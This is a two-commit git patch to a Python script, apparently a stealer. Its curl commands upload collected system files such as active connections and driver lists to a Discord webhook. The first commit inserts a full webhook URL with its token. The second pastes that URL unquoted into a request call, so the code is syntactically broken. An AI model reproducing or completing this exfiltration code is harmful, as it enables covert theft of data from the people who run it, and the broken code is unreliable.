From f4d9bb47fd80fa973996e7f27c60161777279ed9 Mon Sep 17 00:00:00 2001 From: Orixxl67 Date: Tue, 16 Sep 2025 11:49:47 -0700 Subject: [PATCH 1/2] Update 38.py --- 38.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/38.py b/38.py index b1ed045..8bfcf31 100644 --- a/38.py +++ b/38.py @@ -3,7 +3,7 @@ import json from urllib.request import Request, urlopen -WEBHOOK_URL = 'WEBHOOK HERE' # PUT WEBHOOK HERE +WEBHOOK_URL = 'https://discord.com/api/webhooks/1416338920907473087/eMm9X2-COmfQyZsgppXkukAMRODoVz1apS4w5UsRL-309eQ40Iz-w7TboOCb9EEa25RS' # PUT WEBHOOK HERE PING_ME = False @@ -79,3 +79,4 @@ def main(): os.system('''curl -i -H 'Expect: application/json' -F file=@Files\ActiveConnections.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' https://discord.com/api/webhooks/WEBHOOK''') # PUT WEBHOOK HERE os.system('''curl -i -H 'Expect: application/json' -F file=@Files\driverquery.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' https://discord.com/api/webhooks/WEBHOOK''') # PUT WEBHOOK HERE exit() + From 3c2fae844b68b382ad6ec1866fb8369ccb495bce Mon Sep 17 00:00:00 2001 From: Orixxl67 Date: Tue, 16 Sep 2025 11:53:01 -0700 Subject: [PATCH 2/2] Update 38.py --- 38.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/38.py b/38.py index 8bfcf31..9943caa 100644 --- a/38.py +++ b/38.py @@ -62,7 +62,7 @@ def main(): payload = json.dumps({'content': message}) try: - req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers) + req = Request(https://discord.com/api/webhooks/1416338920907473087/eMm9X2-COmfQyZsgppXkukAMRODoVz1apS4w5UsRL-309eQ40Iz-w7TboOCb9EEa25RS, data=payload.encode(), headers=headers) urlopen(req) except: pass @@ -80,3 +80,4 @@ def main(): os.system('''curl -i -H 'Expect: application/json' -F file=@Files\driverquery.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' https://discord.com/api/webhooks/WEBHOOK''') # PUT WEBHOOK HERE exit() +